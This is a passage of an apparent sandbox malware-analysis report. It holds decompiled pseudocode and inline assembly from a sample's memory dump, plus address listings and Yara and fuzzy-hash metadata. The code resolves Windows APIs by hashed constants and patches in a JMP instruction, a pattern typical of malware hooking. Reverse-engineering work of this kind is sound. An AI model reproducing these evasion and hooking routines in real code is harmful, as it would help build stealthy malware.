					asm("movq [esp+0xfc], xmm0");
					E7332F558( &_v636, 0x20);
					asm("movq xmm0, [eax+0x8]");
					asm("movq [esp+0x104], xmm0");
					E7332F558( &_v640, 0x30);
					asm("movq xmm0, [eax+0x8]");
					asm("movq [esp+0x10c], xmm0");
					E7332F558( &_v644, 0x40);
					asm("movq xmm0, [eax+0x8]");
					asm("movq [esp+0x114], xmm0");
					E7332F558( &_v648, 0x50);
					asm("movq xmm0, [eax+0x8]");
					asm("movq [esp+0x11c], xmm0");
					E7332F558( &_v652, 0x60);
					asm("movq xmm0, [eax+0x8]");
					asm("movq [esp+0x124], xmm0");
					E7332F558( &_v656, 0x70);
					asm("movq xmm0, [eax+0x8]");
					asm("movq [ecx+0x118], xmm0");
					_t534 = E7332A5A4( &_v644, __eflags);
					_v524 = _t857;
					_t950 = _t534;
					__eflags = _t950 - 0xffffffffffffffff | _t857 - 0xffffffffffffffff;
					if((_t950 - 0xffffffffffffffff | _t857 - 0xffffffffffffffff) == 0) {
						L50:
						E7332B608(_t955 + 0xbc);
						E7332CDE0( &_v320, __eflags);
						goto L51;
					}
					_t858 =  &_v128;
					__eflags =  *_t858 | _t858[1];
					if(( *_t858 | _t858[1]) != 0) {
						L18:
						_v396 = 0;
						while(1) {
							__eflags = E7332AD68(0x80, _t950, _v400, _v112, _v132);
							if(__eflags != 0) {
								break;
							}
							_t605 = E7332A5A4( &_v520, __eflags);
							_v400 = 0x80;
							_t950 = _t605;
							__eflags = _t950 - 0xffffffffffffffff | 0x81;
							if((_t950 - 0xffffffffffffffff | 0x81) == 0) {
								goto L50;
							}
							_t878 =  &_v396;
							_t609 =  *_t878 + 1;
							 *_t878 = _t609;
							__eflags = _t609 - 0xa;
							if(_t609 != 0xa) {
								continue;
							}
							goto L50;
						}
						_v396 = 0;
						while(1) {
							_push(0x80);
							_push(_v132);
							_push(_v112);
							_push(_v400);
							_push(_t950);
							_t860 =  &(( &_v520)[0x38]);
							__eflags = E7332A298( &_v520, _t860);
							if(__eflags != 0) {
								break;
							}
							_t600 = E7332A5A4( &_v540, __eflags);
							_v420 = _t860;
							_t950 = _t600;
							__eflags = _t950 - 0xffffffffffffffff | _t860 - 0xffffffffffffffff;
							if((_t950 - 0xffffffffffffffff | _t860 - 0xffffffffffffffff) == 0) {
								goto L50;
							}
							_t877 =  &_v416;
							_t604 =  *_t877 + 1;
							 *_t877 = _t604;
							__eflags = _t604 - 0xa;
							if(_t604 != 0xa) {
								continue;
							}
							goto L50;
						}
						asm("cdq");
						asm("movd xmm1, eax");
						_v416 =  *((intOrPtr*)(_t955 + 0x1a4));
						_t647 =  &_v408;
						asm("movd xmm0, edx");
						asm("punpckldq xmm1, xmm0");
						 *_t647 = 0;
						 *((intOrPtr*)(_t647 - 4)) = _v188;
						asm("movq [edx], xmm1");
						_t544 = E73333BA0(_t951, _t647 - 8, __eflags,  &(_t647[0x48]), 0x40, _t647);
						__eflags = _t544;
						if(_t544 != 0) {
							goto L50;
						}
						_v180 = 0;
						while(1) {
							_t863 = _v184;
							__eflags = E7332AD68(_t863, _t950, _v420,  *((intOrPtr*)(_t955 + 0x1a8)), _v188);
							if(__eflags != 0) {
								break;
							}
							_t595 = E7332A5A4( &_v540, __eflags);
							_v420 = _t863;
							_t950 = _t595;
							__eflags = _t950 - 0xffffffffffffffff | _t863 - 0xffffffffffffffff;
							if((_t950 - 0xffffffffffffffff | _t863 - 0xffffffffffffffff) == 0) {
								goto L50;
							}
							_t876 =  &_v180;
							_t599 =  *_t876 + 1;
							 *_t876 = _t599;
							__eflags = _t599 - 0xa;
							if(_t599 != 0xa) {
								continue;
							}
							goto L50;
						}
						_v184 = 0;
						while(1) {
							_t546 = E7332F558( &_v404, 0);
							_push(E7332F568( &_v408));
							_push(_v192);
							_push(_v144);
							_push(_v424);
							_push(_t950);
							_t864 = _t546;
							__eflags = E7332A298( &_v544, _t864);
							if(__eflags != 0) {
								break;
							}
							_t590 = E7332A5A4( &_v560, __eflags);
							_v440 = _t864;
							_t950 = _t590;
							__eflags = _t950 - 0xffffffffffffffff | _t864 - 0xffffffffffffffff;
							if((_t950 - 0xffffffffffffffff | _t864 - 0xffffffffffffffff) == 0) {
								goto L50;
							}
							_t875 =  &_v204;
							_t594 =  *_t875 + 1;
							 *_t875 = _t594;
							__eflags = _t594 - 0xa;
							if(_t594 != 0xa) {
								continue;
							}
							goto L50;
						}
						_t550 = E73333BA0(_t951,  &_v428 - 8, __eflags,  &_v428 + 0x120, _v428,  &_v428);
						__eflags = _t550;
						if(_t550 != 0) {
							goto L50;
						}
						E7332F620( &_v208, 0);
						_v100 = 0xe9;
						E7332F578( &_v100 - 0x70, __eflags,  &_v100, 1);
						_t650 =  &_v104;
						_t556 = _v172 -  *((intOrPtr*)(_t650 - 0x54)) + 0xfffffffb;
						__eflags = _t556;
						 *_t650 = _t556;
						E7332F578(_t650 - 0x74, __eflags, _t650, 4);
						_t907 =  &_v448;
						asm("movq xmm0, [0x7333b798]");
						 *((intOrPtr*)(_t907 - 8)) = _v196;
						 *((intOrPtr*)(_t907 - 4)) =  *((intOrPtr*)(_t907 + 0x110));
						asm("movq [ebx], xmm0");
						E73333BA0(_t951, _t907 + 0x120 - 0x128, __eflags, _t907 + 0x120, 0x40, _t907);
						_v192 = 0;
						while(1) {
							_t561 = E7332F558( &_v208, 0);
							_push(E7332F568( &_v212));
							_push(_v160);
							_push(_v180);
							_push(_v444);
							_push(_t950);
							_t867 = _t561;
							__eflags = E7332A298( &_v564, _t867);
							if(__eflags != 0) {
								break;
							}
							_t585 = E7332A5A4( &_v580, __eflags);
							_v460 = _t867;
							_t950 = _t585;
							__eflags = _t950 - 0xffffffffffffffff | _t867 - 0xffffffffffffffff;
							if((_t950 - 0xffffffffffffffff | _t867 - 0xffffffffffffffff) == 0) {
								L49:
								E7332F6F0(_t955 + 0x174);
								goto L50;
							}
							_t874 =  &_v180;
							_t589 =  *_t874 + 1;
							 *_t874 = _t589;
							__eflags = _t589 - 0xa;
							if(_t589 != 0xa) {
								continue;
							}
							goto L49;
						}
						_v180 = 0;
						while(1) {
							_t955 = _t955 + 0xffffffd8;
							asm("pxor xmm0, xmm0");
							_v640 = _t950;
							_v636 = _v460;
							_t868 = _v196;
							_v632 = _t868;
							_v628 = _v176;
							_t806 =  &_v580;
							_v624 =  *((intOrPtr*)(_t806 + 0x198));
							_v620 =  *((intOrPtr*)(_t806 + 0x184));
							asm("movq [esp+0x18], xmm0");
							asm("movq [esp+0x20], xmm0");
							__eflags = E7332AD04(__eflags);
							if(__eflags != 0) {
								break;
							}
							_t579 = E7332A5A4( &_v616, __eflags);
							_v496 = _t868;
							_t950 = _t579;
							__eflags = _t950 - 0xffffffffffffffff | _t868 - 0xffffffffffffffff;
							if((_t950 - 0xffffffffffffffff | _t868 - 0xffffffffffffffff) == 0) {
								goto L49;
							}
							_t872 =  &_v216;
							_t584 =  *_t872 + 1;
							 *_t872 = _t584;
							__eflags = _t584 - 0xa;
							if(__eflags != 0) {
								continue;
							}
							goto L49;
						}
						_push(0);
						_t869 = _v164;
						__eflags = _t869;
						_t870 =  !=  ? _t869 + 0xc : _t869;
						_push( !=  ? _t869 + 0xc : _t869);
						_t567 = E7332C3A8(_t869,  &_v416, 0x2710);
						E7332F6F0(_t955 + 0x184);
						E7332B608( &_v448);
						E7332CDE0( &_v416, __eflags);
						E7332F6F0( &_v480);
						E7332F6F0( &_v464);
						E7332F6F0( &_v432);
						E7332F6F0( &_v632);
						E7332B680( &_v592);
						E7332F6F0( &_v608);
						__eflags = _t567;
						return 0 | _t567 == 0x00000000;
					}
					_v388 = 0;
					do {
						E7332F620(_t955 + 0x188, 0);
						_push(0x23627913);
						_push(_t955 + 0x1cc);
						E73331D00();
						E7332DD7C(_t955 + 0x1d0 - 8, _t955 + 0x1d0);
						_t879 = 0x7fffffff;
						E7332F578( &_v168, __eflags, _v92, E7332E94C(_v92, 0x7fffffff));
						E7332E054( &_v100);
						E7332D098( &_v108);
						_t836 =  &_v176;
						_t665 =  *((intOrPtr*)(_t836 + 0x28));
						 *((intOrPtr*)(_t836 - 0xf0)) = _v156;
						__eflags = E7332F568(_t836);
						if(__eflags <= 0) {
							L12:
							_t955 = _t955 + 0xffffffd8;
							asm("movq xmm0, [esp+0xac]");
							asm("pxor xmm1, xmm1");
							_t837 =  &_v528;
							_v588 = _t950;
							_v584 =  *((intOrPtr*)(_t837 + 0x78));
							asm("movq [esp+0x8], xmm0");
							_v572 =  *((intOrPtr*)(_t837 + 0x198));
							_v568 =  *((intOrPtr*)(_t837 + 0x184));
							asm("movq [esp+0x18], xmm1");
							asm("movq [esp+0x20], xmm1");
							_t622 = E7332AD04(__eflags);
							__eflags = _t622;
							if(_t622 != 0) {
								E7333218C(0x3e8, _t879, _t950);
								E7332F6F0( &_v196);
								E7332ADB8( &_v564,  &(( &_v172)[5]), __eflags,  &_v172);
								_t881 =  &_v176;
								__eflags =  *_t881 | _t881[1];
								if(__eflags != 0) {
									goto L18;
								}
								_t629 = E7332A5A4( &_v564, __eflags);
								_v444 = _t881;
								_t950 = _t629;
								__eflags = _t950 - 0xffffffffffffffff | _t881 - 0xffffffffffffffff;
								if((_t950 - 0xffffffffffffffff | _t881 - 0xffffffffffffffff) == 0) {
									goto L50;
								}
								goto L16;
							}
							L13:
							E7332F6F0( &_v196);
							goto L50;
						}
						_v404 = 0;
						while(1) {
							_t635 = E7332F558( &_v160, _v404);
							_t879 = _t635;
							_t955 = _t955 + 0xffffffd8;
							asm("movq xmm0, [esp+0x94]");
							_t844 =  &_v532;
							asm("movq xmm1, [0x7333b790]");
							_v592 = _t950;
							_v588 =  *((intOrPtr*)(_t844 + 0x78));
							asm("movq [esp+0x8], xmm0");
							_v576 = _t665;
							_v572 =  *((intOrPtr*)(_t844 + 0x80));
							_v568 =  *_t635 & 0x000000ff;
							_v564 = 0;
							asm("movq [esp+0x20], xmm1");
							_t638 = E7332AD04(__eflags);
							__eflags = _t638;
							if(_t638 == 0) {
								goto L13;
							}
							_t845 = 0x64;
							E7333218C(_t845, _t879, _t950);
							_t665 = _t665 + 1;
							asm("adc dword [ecx-0xf0], 0x0");
							 *((intOrPtr*)( &_v196 - 0xf4)) =  *((intOrPtr*)( &_v196 - 0xf4)) + 1;
							__eflags = E7332F568( &_v196) - _v440;
							if(__eflags > 0) {
								continue;
							}
							goto L12;
						}
						goto L13;
						L16:
						_t882 =  &_v432;
						_t633 =  *_t882 + 1;
						 *_t882 = _t633;
						__eflags = _t633 - 0xa;
					} while (_t633 != 0xa);
					goto L50;
				}
				L1:
				E7332F6F0( &_v532);
				E7332B680( &_v492);
				E7332F6F0( &_v508);
				return 0;
			}

0x73329144
0x73329148
0x7332914e
0x73329150
0x73329161
0x73329164
0x7332916b
0x73329174
0x7332917b
0x7332917f
0x73329188
0x7332918f
0x73329197
0x7332919c
0x733291ab
0x733291af
0x733291c4
0x733291da
0x733291e8
0x733291e9
0x733291ea
0x733291eb
0x733291ec
0x733291f3
0x733291f7
0x73329201
0x73329216
0x7332922c
0x7332923a
0x7332923b
0x7332923c
0x7332923d
0x7332923e
0x73329245
0x73329249
0x73329253
0x73329268
0x7332927e
0x7332928c
0x7332928d
0x7332928e
0x7332928f
0x73329290
0x73329297
0x7332929b
0x733292a5
0x733292ba
0x733292d0
0x733292de
0x733292df
0x733292e0
0x733292e1
0x733292e2
0x733292e9
0x733292ed
0x733292f7
0x7332930c
0x73329322
0x73329330
0x73329331
0x73329332
0x73329333
0x73329334
0x7332933b
0x7332933f
0x73329349
0x7332935e
0x73329374
0x73329382
0x73329383
0x73329384
0x73329385
0x7332938e
0x73329390
0x7332939b
0x733293a0
0x733293a5
0x733293b1
0x733293b6
0x733293bb
0x733293c7
0x733293cc
0x733293d1
0x733293dd
0x733293e2
0x733293e7
0x733293f3
0x733293f8
0x733293fd
0x73329409
0x7332940e
0x7332941a
0x73329420
0x73329430
0x73329435
0x7332943e
0x73329447
0x7332947e
0x73329487
0x7332948c
0x73329497
0x733294a1
0x733294a7
0x733294b9
0x733294cf
0x733294dd
0x733294de
0x733294df
0x733294e0
0x733294e1
0x733294e8
0x733294f2
0x733294f8
0x7332950a
0x73329520
0x7332952e
0x7332952f
0x73329530
0x73329531
0x73329532
0x73329539
0x73329543
0x73329549
0x7332955b
0x73329571
0x7332957f
0x73329580
0x73329581
0x73329582
0x73329583
0x73329586
0x73329589
0x7332959f
0x733295a4
0x733295a8
0x733295b3
0x733295b8
0x733295bd
0x733295c9
0x733295ce
0x733295d3
0x733295e7
0x733295ef
0x733295f6
0x73329606
0x73329614
0x73329620
0x73329622
0x73329629
0x7332963c
0x73329643
0x7332965c
0x7332966a
0x73329681
0x7332968f
0x73329694
0x733296a0
0x733296ad
0x733296b4
0x733296c9
0x733296ce
0x733296d5
0x733296dc
0x733296e3
0x7332a1d7
0x7332a1de
0x7332a1ea
0x7332a1f6
0x00000000
0x7332a1f6
0x733296f0
0x733296f7
0x00000000
0x00000000
0x7332970c
0x73329711
0x73329722
0x73329727
0x73329733
0x7332973a
0x73329740
0x73329745
0x73329748
0x7332974e
0x7332975c
0x7332975d
0x73329761
0x73329765
0x73329769
0x7332977e
0x73329789
0x7332978a
0x7332978e
0x73329792
0x73329796
0x733297a0
0x733297b6
0x733297b7
0x733297bb
0x733297bf
0x733297c3
0x733297df
0x733297f5
0x733297f5
0x733297fb
0x733297fd
0x73329800
0x73329805
0x7332980c
0x73329810
0x73329814
0x7332981a
0x73329820
0x73329832
0x73329848
0x73329856
0x73329857
0x73329858
0x73329859
0x7332985a
0x73329861
0x7332986b
0x73329871
0x73329883
0x73329899
0x733298a7
0x733298a8
0x733298a9
0x733298aa
0x733298ab
0x733298b2
0x733298bc
0x733298c2
0x733298d4
0x733298ea
0x733298f8
0x733298f9
0x733298fa
0x733298fb
0x733298fc
0x73329903
0x7332990d
0x73329913
0x73329925
0x7332993b
0x73329949
0x7332994a
0x7332994b
0x7332994c
0x7332994d
0x73329950
0x73329954
0x73329958
0x7332995e
0x73329964
0x73329976
0x7332998c
0x7332999a
0x7332999b
0x7332999c
0x7332999d
0x7332999e
0x733299a5
0x733299af
0x733299b5
0x733299c7
0x733299dd
0x733299eb
0x733299ec
0x733299ed
0x733299ee
0x733299ef
0x733299f6
0x73329a00
0x73329a06
0x73329a18
0x73329a2e
0x73329a3c
0x73329a3d
0x73329a3e
0x73329a3f
0x73329a40
0x73329a47
0x73329a51
0x73329a57
0x73329a69
0x73329a7f
0x73329a8d
0x73329a8e
0x73329a8f
0x73329a90
0x73329a96
0x73329a99
0x73329a9b
0x73329aa6
0x73329aab
0x73329ab0
0x73329abf
0x73329ac4
0x73329ac9
0x73329ad8
0x73329add
0x73329ae2
0x73329af1
0x73329af6
0x73329afb
0x73329b0a
0x73329b0f
0x73329b14
0x73329b23
0x73329b28
0x73329b2d
0x73329b3c
0x73329b41
0x73329b46
0x73329b55
0x73329b5a
0x73329b63
0x73329b6b
0x73329b70
0x73329b77
0x73329b84
0x73329b86
0x7332a1bf
0x7332a1c6
0x7332a1d2
0x00000000
0x7332a1d2
0x73329b8c
0x73329b95
0x73329b98
0x73329db0
0x73329db0
0x73329dbb
0x73329ddf
0x73329de1
0x00000000
0x00000000
0x73329de7
0x73329dec
0x73329df3
0x73329e00
0x73329e02
0x00000000
0x00000000
0x73329e08
0x73329e11
0x73329e12
0x73329e14
0x73329e17
0x00000000
0x00000000
0x00000000
0x73329e19
0x73329e1e
0x73329e29
0x73329e29
0x73329e2e
0x73329e35
0x73329e3c
0x73329e43
0x73329e48
0x73329e53
0x73329e55
0x00000000
0x00000000
0x73329e5b
0x73329e60
0x73329e67
0x73329e74
0x73329e76
0x00000000
0x00000000
0x73329e7c
0x73329e85
0x73329e86
0x73329e88
0x73329e8b
0x00000000
0x00000000
0x00000000
0x73329e8d
0x73329e9b
0x73329ea3
0x73329eae
0x73329eb5
0x73329ebc
0x73329ec0
0x73329ec4
0x73329eca
0x73329ed5
0x73329ee0
0x73329ee5
0x73329ee7
0x00000000
0x00000000
0x73329eed
0x73329ef8
0x73329f0e
0x73329f1e
0x73329f20
0x00000000
0x00000000
0x73329f26
0x73329f2b
0x73329f32
0x73329f3f
0x73329f41
0x00000000
0x00000000
0x73329f47
0x73329f50
0x73329f51
0x73329f53
0x73329f56
0x00000000
0x00000000
0x00000000
0x73329f58
0x73329f5d
0x73329f68
0x73329f71
0x73329f84
0x73329f85
0x73329f8c
0x73329f93
0x73329f9a
0x73329f9b
0x73329fa6
0x73329fa8
0x00000000
0x00000000
0x73329fae
0x73329fb3
0x73329fba
0x73329fc7
0x73329fc9
0x00000000
0x00000000
0x73329fcf
0x73329fd8
0x73329fd9
0x73329fdb
0x73329fde
0x00000000
0x00000000
0x00000000
0x73329fe0
0x7332a000
0x7332a005
0x7332a007
0x00000000
0x00000000
0x7332a016
0x7332a022
0x7332a02d
0x7332a039
0x7332a043
0x7332a043
0x7332a046
0x7332a04e
0x7332a05a
0x7332a069
0x7332a071
0x7332a074
0x7332a07d
0x7332a08d
0x7332a092
0x7332a09d
0x7332a0a6
0x7332a0b9
0x7332a0ba
0x7332a0c1
0x7332a0c8
0x7332a0cf
0x7332a0d0
0x7332a0db
0x7332a0dd
0x00000000
0x00000000
0x7332a0e3
0x7332a0e8
0x7332a0ef
0x7332a0fa
0x7332a0fc
0x7332a1b3
0x7332a1ba
0x00000000
0x7332a1ba
0x7332a102
0x7332a10b
0x7332a10c
0x7332a10e
0x7332a111
0x00000000
0x00000000
0x00000000
0x7332a113
0x7332a118
0x7332a123
0x7332a123
0x7332a126
0x7332a12a
0x7332a134
0x7332a138
0x7332a13f
0x7332a14a
0x7332a14e
0x7332a158
0x7332a162
0x7332a166
0x7332a16c
0x7332a177
0x7332a179
0x00000000
0x00000000
0x7332a183
0x7332a188
0x7332a18f
0x7332a19a
0x7332a19c
0x00000000
0x00000000
0x7332a19e
0x7332a1a7
0x7332a1a8
0x7332a1aa
0x7332a1ad
0x00000000
0x00000000
0x00000000
0x7332a1ad
0x7332a200
0x7332a202
0x7332a209
0x7332a20e
0x7332a211
0x7332a21f
0x7332a230
0x7332a23c
0x7332a248
0x7332a254
0x7332a260
0x7332a26c
0x7332a275
0x7332a27e
0x7332a287
0x7332a28e
0x00000000
0x7332a290
0x73329b9e
0x73329ba9
0x73329bb2
0x73329bb7
0x73329bc3
0x73329bc4
0x73329bd4
0x73329be2
0x73329bf5
0x73329c01
0x73329c0d
0x73329c19
0x73329c20
0x73329c23
0x73329c2e
0x73329c30
0x73329cdb
0x73329cdb
0x73329cde
0x73329ce7
0x73329ceb
0x73329cef
0x73329cf5
0x73329cf9
0x73329d05
0x73329d0f
0x73329d13
0x73329d19
0x73329d1f
0x73329d24
0x73329d26
0x73329d3e
0x73329d4a
0x73329d5e
0x73329d63
0x73329d6c
0x73329d6f
0x00000000
0x00000000
0x73329d75
0x73329d7a
0x73329d81
0x73329d8e
0x73329d90
0x00000000
0x00000000
0x00000000
0x73329d90
0x73329d28
0x73329d2f
0x00000000
0x73329d2f
0x73329c36
0x73329c41
0x73329c4f
0x73329c54
0x73329c56
0x73329c59
0x73329c62
0x73329c66
0x73329c6e
0x73329c74
0x73329c78
0x73329c7e
0x73329c8b
0x73329c8f
0x73329c93
0x73329c9b
0x73329ca1
0x73329ca6
0x73329ca8
0x00000000
0x00000000
0x73329cac
0x73329cad
0x73329cb2
0x73329cbc
0x73329cc3
0x73329cce
0x73329cd5
0x00000000
0x00000000
0x00000000
0x73329cd5
0x00000000
0x73329d96
0x73329d96
0x73329d9f
0x73329da0
0x73329da2
0x73329da2
0x00000000
0x73329dab
0x73329449
0x7332944d
0x73329456
0x7332945f
0x00000000

Strings

$EA, xrefs: 733291E1

Memory Dump Source

Source File: 00000002.00000002.617918728.0000000073321000.00000020.00020000.sdmp, Offset: 73320000, based on PE: true

Associated: 00000002.00000002.617906797.0000000073320000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.617950082.000000007333A000.00000002.00020000.sdmp Download File
Associated: 00000002.00000002.617974649.000000007333D000.00000004.00020000.sdmp Download File
Associated: 00000002.00000002.618004135.000000007333F000.00000002.00020000.sdmp Download File

Yara matches

Similarity

API ID:
String ID: $EA
API String ID: 0-4251458306
Opcode ID: f39439eea50676cc4062fc86a20fef5ece32bdc18dfe6ac7ef976b837bdfadb3
Instruction ID: 5e1ab0cb19d17da53db174db5b2bb187d499cca1cfad2cba2fd0e130cb3ac9e6
Opcode Fuzzy Hash: f39439eea50676cc4062fc86a20fef5ece32bdc18dfe6ac7ef976b837bdfadb3
Instruction Fuzzy Hash: 85A270719043419FE735DF24C840BDEBBF4AF96311F508A2DE4999B1A1EF30A94ACB52

Uniqueness

Uniqueness Score: -1.00%

Function 7332A5A4, Relevance: 1.8, Strings: 1, Instructions: 537
COMMONCrypto

Download Yara Rule

C-Code - Quality: 84%

			E7332A5A4(signed int* __ecx, void* __eflags) {
				void* __esi;
				void* __ebp;
				void* _t182;
				signed int _t183;
				signed int* _t188;
				void* _t198;
				void* _t199;
				void* _t228;
				void* _t229;
				void* _t242;
				void* _t243;
				void* _t251;
				signed int* _t271;
				void* _t282;
				void* _t284;
				void* _t285;
				void* _t296;
				signed int* _t308;
				void* _t324;
				signed int _t398;
				signed int _t402;
				intOrPtr* _t403;
				intOrPtr* _t404;
				signed int _t406;
				signed int _t407;
				signed int _t409;
				signed int _t411;
				signed int _t412;
				void* _t413;
				signed int _t414;
				signed int _t415;
				signed int _t416;
				signed int _t419;
				void* _t420;
				signed int _t421;
				void* _t422;
				signed int _t424;
				signed int _t429;
				signed int _t433;
				signed int _t434;
				signed int _t437;
				intOrPtr* _t439;

				_t308 = __ecx;
				 *(_t439 + 0x78) = 0;
				 *_t439 = __ecx + 8;
				 *((intOrPtr*)(_t439 + 4)) = __ecx + 0x20;
				while(1) {
					_t392 =  *_t308;
					E7332B714(_t439 + 0x24, _t392, 0x7fffffff);
					if(E7332F56C(_t439 + 0x24) == 0) {
						goto L3;
					} else {
						_t308[0xc] = 0;
						E7332F6F0(_t439 + 0x24);
					}
					L63:
					_t398 = 0xffffffffffffffff;
					_t407 = 0xffffffffffffffff;
					L65:
					if((_t407 | _t398) != 0) {
						L68:
						return _t407;
					}
					if( *(_t439 + 0x78) != 0x20) {
						E7333218C(0x5dc, _t392, _t407);
						 *(_t439 + 0x78) =  *(_t439 + 0x78) + 1;
						continue;
					}
					_t398 = 0xffffffffffffffff;
					_t407 = 0xffffffffffffffff;
					goto L68;
					L3:
					__eflags = _t308[1];
					if(_t308[1] <= 0) {
						L21:
						__eflags =  *(_t439 + 0x20);
						if( *(_t439 + 0x20) <= 0) {
							L33:
							E7332F6F0(_t439 + 0x24);
							__eflags = _t308[0xc];
							if(_t308[0xc] == 0) {
								L46:
								 *((intOrPtr*)(_t439 + 8)) = 0;
								 *((intOrPtr*)(_t439 + 0xc)) = 0;
								E7332F620(_t439 + 0x14, 0);
								 *((intOrPtr*)(_t439 + 0x38)) = 0;
								 *(_t439 + 0x34) =  *_t308;
								E7332F620(_t439 + 0x40, 0);
								_t182 = 0x40;
								__eflags = _t308[7] - 0x40;
								_t183 =  <  ? _t308[7] : _t182;
								 *(_t439 + 0x74) = _t183;
								__eflags = _t183;
								if(_t183 <= 0) {
									L57:
									asm("movq xmm0, [0x7333b7a8]");
									asm("movq [esp+0x84], xmm0");
									_t406 = E73332F8C(0xa5eabdf8, 0xd1a06a90);
									__eflags = _t406;
									if(_t406 == 0) {
										_t424 = 0;
										__eflags = 0;
										L61:
										__eflags = _t424 - 0x3f;
										if(_t424 <= 0x3f) {
											__eflags = _t424 << 2;
											_t308[0xc] =  *(E7332F558( *((intOrPtr*)(_t439 + 8)), _t424 << 2));
											_t188 = E7332F558( *((intOrPtr*)(_t439 + 4)), _t424 << 2);
											_t407 = _t308[0xc];
											asm("cdq");
											_t308[0xd] =  *_t188;
											_t398 = _t392;
											E7332B680(_t439 + 0x34);
											E7332B680(_t439 + 8);
											goto L65;
										}
										L62:
										E7332B680(_t439 + 0x34);
										E7332B680(_t439 + 8);
										goto L63;
									}
									_t392 = E7332F558(_t439 + 0x14, 0);
									_t198 =  *_t406( *((intOrPtr*)(_t439 + 0xc)), _t392, 1, 0, _t439 + 0x84);
									_t133 = _t198 - 0x80; // -128
									_t199 = _t133;
									__eflags = _t199 - 0x3f;
									_t424 =  <=  ? _t199 : _t198;
									__eflags = _t424 - 0x102;
									if(_t424 == 0x102) {
										goto L62;
									}
									goto L61;
								}
								_t437 = 0;
								__eflags = 0;
								while(1) {
									E7332CB48(_t439 + 0x4c);
									_t392 = 0;
									_t324 = _t439 + 0x4c;
									 *((char*)(_t324 + 4)) = 0;
									 *((intOrPtr*)(_t324 + 0x1c)) = 0;
									__eflags = E7332C33C(_t324);
									if(__eflags != 0) {
										break;
									}
									E7332F8C4(_t439 + 0x14, E7332F568(_t439 + 0x10) + 4);
									 *((intOrPtr*)(E7332F558(_t439 + 0x14, E7332F568(_t439 + 0x10) + 0xfffffffc))) =  *((intOrPtr*)(_t439 + 0x4c));
									 *((intOrPtr*)(_t439 + 0xc)) =  *((intOrPtr*)(_t439 + 0xc)) + 1;
									_t409 = E73332F8C(0xa5eabdf8, 0xf3119fba);
									__eflags = _t409;
									if(_t409 == 0) {
										L51:
										_t392 =  *(_t439 + 0x68);
										__eflags = _t392;
										if(__eflags == 0) {
											break;
										}
										__eflags = _t392 - 0xffffffff;
										if(__eflags != 0) {
											E7332F8C4(_t439 + 0x40, E7332F568(_t439 + 0x3c) + 4);
											 *(E7332F558(_t439 + 0x40, E7332F568(_t439 + 0x3c) + 0xfffffffc)) =  *(_t439 + 0x68);
											 *((intOrPtr*)(_t439 + 0x4c - 0x14)) =  *((intOrPtr*)(_t439 + 0x4c - 0x14)) + 1;
											E7332CDE0(_t439 + 0x4c, __eflags);
											_t437 = _t437 + 1;
											__eflags = _t437 -  *(_t439 + 0x74);
											if(_t437 <  *(_t439 + 0x74)) {
												continue;
											}
											_t411 = 0;
											__eflags = 0;
											do {
												E7332F558( *((intOrPtr*)(_t439 + 8)), _t411 * 4);
												E7332F558(_t439 + 0x40, _t411 * 4);
												_t439 = _t439 + 0xffffffd8;
												asm("cdq");
												asm("pxor xmm5, xmm5");
												asm("movd xmm1, dword [ebp]");
												asm("movd xmm4, dword [edi]");
												asm("movd xmm0, edx");
												asm("cdq");
												asm("punpckldq xmm1, xmm0");
												asm("movq xmm2, [ebx+0x38]");
												asm("movq [esp], xmm1");
												asm("movd xmm3, edx");
												asm("punpckldq xmm4, xmm3");
												asm("movq [esp+0x8], xmm2");
												asm("movq [esp+0x10], xmm4");
												asm("movq [esp+0x18], xmm5");
												asm("movq [esp+0x20], xmm5");
												E7332AD04(__eflags);
												_t411 = _t411 + 1;
												__eflags = _t411 -  *(_t439 + 0x74);
											} while (_t411 <  *(_t439 + 0x74));
											goto L57;
										}
										break;
									}
									_t392 = _t439 + 0x68;
									 *_t409(0xffffffff,  *((intOrPtr*)(_t439 + 0x60)),  *_t308, _t439 + 0x68, 0, 0, 2);
									__eflags = 0;
									if(0 != 0) {
										break;
									}
									goto L51;
								}
								E7332CDE0(_t439 + 0x4c, __eflags);
								goto L62;
							}
							_t402 = _t308[1];
							__eflags = _t402;
							if(_t402 <= 0) {
								goto L46;
							}
							_t412 = 0;
							__eflags = 0;
							while(1) {
								_t429 = _t412 * 4;
								_t392 =  *(E7332F558( *((intOrPtr*)(_t439 + 4)), _t429));
								__eflags = _t392 - _t308[0xd];
								if(_t392 == _t308[0xd]) {
									break;
								}
								_t412 = _t412 + 1;
								__eflags = _t412 - _t402;
								if(_t412 < _t402) {
									continue;
								}
								goto L46;
							}
							__eflags = _t412 - 0xffffffff;
							if(_t412 != 0xffffffff) {
								_t228 = E7332F568( *((intOrPtr*)(_t439 + 4)));
								__eflags = _t228 - _t429;
								if(_t228 > _t429) {
									_t392 = 4 + _t412 * 4;
									 *(_t439 + 0x6c) = _t392;
									_t251 = E7332F568( *((intOrPtr*)(_t439 + 4)));
									__eflags = _t251 -  *(_t439 + 0x6c);
									if(_t251 >  *(_t439 + 0x6c)) {
										 *((intOrPtr*)(_t439 + 0x90)) = E7332F558( *((intOrPtr*)(_t439 + 8)), _t429);
										 *((intOrPtr*)(_t439 + 0x8c)) = E7332F558( *((intOrPtr*)(_t439 + 8)),  *(_t439 + 0x6c));
										E7333382C( *((intOrPtr*)(_t439 + 0x98)),  *((intOrPtr*)(_t439 + 0x90)), E7332F568( *((intOrPtr*)(_t439 + 4))) -  *(_t439 + 0x6c));
										_t439 = _t439 + 0xc;
									}
									E7332F8C4( *((intOrPtr*)(_t439 + 8)), E7332F568( *((intOrPtr*)(_t439 + 4))) + 0xfffffffc);
									_t74 =  &(_t308[7]);
									 *_t74 = _t308[7] - 1;
									__eflags =  *_t74;
								}
								_t229 = E7332F568( *_t439);
								__eflags = _t229 - _t429;
								if(_t229 > _t429) {
									_t413 = 4 + _t412 * 4;
									_t242 = E7332F568( *_t439);
									__eflags = _t242 - _t413;
									if(_t242 > _t413) {
										_t243 = E7332F558( *((intOrPtr*)(_t439 + 4)), _t429);
										 *((intOrPtr*)(_t439 + 0x94)) = E7332F558( *((intOrPtr*)(_t439 + 4)), _t413);
										E7333382C(_t243,  *((intOrPtr*)(_t439 + 0x98)), E7332F568( *_t439) - _t413);
										_t439 = _t439 + 0xc;
									}
									E7332F8C4( *((intOrPtr*)(_t439 + 4)), E7332F568( *_t439) + 0xfffffffc);
									_t79 =  &(_t308[1]);
									 *_t79 = _t308[1] - 1;
									__eflags =  *_t79;
								}
